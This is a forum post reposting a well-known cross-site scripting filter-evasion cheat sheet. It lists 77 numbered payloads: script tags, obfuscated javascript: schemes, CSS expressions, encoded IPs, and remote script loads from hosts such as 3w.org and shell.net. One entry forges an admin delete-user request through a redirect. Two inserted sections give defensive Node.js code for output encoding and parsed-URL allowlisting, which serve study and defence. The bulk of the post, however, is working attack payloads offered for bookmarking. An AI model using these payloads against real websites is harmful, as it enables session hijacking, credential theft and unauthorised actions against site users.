There doesn't seem to be much XSS material on t00ls, so I copied this good stuff over; not sure whether any of you need to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around character limits (requires the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters basically have no effect in China, because there is nowhere they can be used.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double opening brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double opening angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with the expression split up
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made up of an opening angle bracket and a leading letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
expression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; arbitrary commands can be executed
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
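Entries (6), (23), (26) and (61) to (67) all work the same way: a quote, a backtick or an angle bracket in the untrusted value closes the attribute or tag it was placed in, and the rest of the value is parsed as new markup. The defence is context-aware output encoding. The following is an added example, not code from the original post or from the cheat sheet it was copied from; the function names are my own, and it assumes Node.js 8 or later (for String.prototype.padStart).

```javascript
// Added example, not part of the original post: context-aware HTML output
// encoding, the defence that neutralises the quote- and tag-breaking vectors
// in entries (6), (23), (26) and (61)-(67). Function names are my own choice.
// Assumes Node.js 8+ (String.prototype.padStart).

// Text-node context: the five characters that can open a tag, start an entity
// or close a quoted attribute.
const TEXT_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

function encodeForHtmlText(value) {
  return String(value).replace(/[&<>"']/g, ch => TEXT_ESCAPES[ch]);
}

// Attribute context (OWASP XSS prevention rule 2): every non-alphanumeric
// character below U+0100 becomes &#xHH;. That covers the backtick of entry
// (65), which old IE accepted as an attribute quote, as well as "=", "/" and
// whitespace, so the value stays inert even if a template forgets to quote the
// attribute. Characters at U+0100 and above cannot close a tag or attribute and
// are left alone.
function encodeForHtmlAttribute(value) {
  return String(value).replace(/[^A-Za-z0-9]/gu, ch => {
    const cp = ch.codePointAt(0);
    return cp < 256 ? '&#x' + cp.toString(16).toUpperCase().padStart(2, '0') + ';' : ch;
  });
}

// Build an anchor from an untrusted href and label. Encoding keeps each value
// inside its own context; whether the href's scheme is acceptable at all is a
// separate check that encoding does not perform.
function renderLink(href, label) {
  return '<a href="' + encodeForHtmlAttribute(href) + '">' + encodeForHtmlText(label) + '</a>';
}

// Constructed demo input: the attribute-breaking value from entry (6) as href
// and a tag as the label. The output contains exactly the two quotes the
// template wrote, and no raw "<".
const demo = renderLink('"><SCRIPT>alert("XSS")</SCRIPT>">', '<b>XSS</b>');
console.log(demo);
```

The attribute encoder is deliberately aggressive; a value that is going to be used as a URL still needs its scheme checked before it is placed in an href, because `javascript:` is perfectly well-formed attribute content and encoding it changes nothing.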
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP as decimal
<A HREF="http://3232235521">XSS</A>

(71) IP as hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP as octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Leaving out [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Leaving out [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) JavaScript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
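Two families of entries above defeat string matching on a raw URL: (3) to (19) and (31) to (46) hide the `javascript:` scheme behind case changes, embedded tab/newline/CR, leading whitespace, NUL bytes and HTML character references, while (68) to (76) hide a host behind decimal, hexadecimal, octal and mixed IPv4 spellings or a trailing dot. A filter that looks for the literal text `javascript` or compares the raw host string misses all of them. The added example below (my own code, not from the original post or the cheat sheet) checks a link the way the browser will interpret it: decode character references as the HTML parser would, hand the result to the WHATWG URL parser, and then allowlist the parsed scheme and hostname. It assumes Node.js 10 or later for the global `URL` class; the function names and the allowlists are my own choices.

```javascript
// Added example, not part of the original post: validate an untrusted link on
// its parsed form rather than its raw text. Assumes Node.js 10+ (global
// WHATWG URL). Function names and allowlists are my own choices.

const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

// Named references that matter for this check; numeric references (decimal and
// hex, with or without the closing semicolon, as in entries (5) and (8)-(10))
// are handled generically below, the way the HTML parser does before the value
// ever reaches the URL parser.
const NAMED_REFS = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", tab: '\t', newline: '\n' };

function decodeHtmlEntities(text) {
  return text.replace(/&(#[xX][0-9a-fA-F]+|#[0-9]+|[a-zA-Z]+);?/g, (whole, body) => {
    if (body[0] === '#') {
      const hex = body[1] === 'x' || body[1] === 'X';
      const cp = parseInt(body.slice(hex ? 2 : 1), hex ? 16 : 10);
      // NUL and out-of-range references are replaced, as browsers do
      if (!Number.isFinite(cp) || cp === 0 || cp > 0x10ffff) return '\uFFFD';
      return String.fromCodePoint(cp);
    }
    const name = body.toLowerCase();
    return Object.prototype.hasOwnProperty.call(NAMED_REFS, name) ? NAMED_REFS[name] : whole;
  });
}

// Returns {allowed: false, reason} or {allowed: true, href, hostname}.
// The WHATWG parser strips leading/trailing whitespace and every tab, LF and CR
// before reading the scheme, so "jav\tascript:" and " javascript:" both come
// back with protocol "javascript:" and are refused by the allowlist. A NUL
// inside the scheme (entry (17)) makes the string unparseable, which is refused
// too. No base URL is supplied, so scheme-relative links like entry (74) are
// also refused; pass a base to new URL() if a site wants to accept them.
function classifyUrl(raw) {
  const decoded = decodeHtmlEntities(String(raw));
  let parsed;
  try {
    parsed = new URL(decoded);
  } catch (err) {
    return { allowed: false, reason: 'unparseable' };
  }
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) {
    return { allowed: false, reason: 'scheme ' + parsed.protocol };
  }
  return { allowed: true, href: parsed.href, hostname: parsed.hostname };
}

// Host allowlist on the parsed hostname. The URL parser has already turned
// 3232235521, 0xc0.0xa8.0x00.0x01 and 0300.0250.0000.0001 (entries (70)-(72))
// into 192.168.0.1, so only case and the trailing dot of entry (76) are left
// to normalise here.
function hostAllowed(hostname, allowlist) {
  const host = hostname.toLowerCase().replace(/\.$/, '');
  return allowlist.some(domain => host === domain || host.endsWith('.' + domain));
}

// Constructed demo inputs taken from the entries above.
console.log(classifyUrl("jav\tascript:alert('XSS');"));   // refused: scheme javascript:
console.log(classifyUrl('http://3232235521/'));            // allowed, hostname 192.168.0.1
```

The point of the split into `classifyUrl` and `hostAllowed` is that every comparison happens on what the parser produced, never on the text the user typed; any normalisation the browser performs is performed here first by the same class of parser.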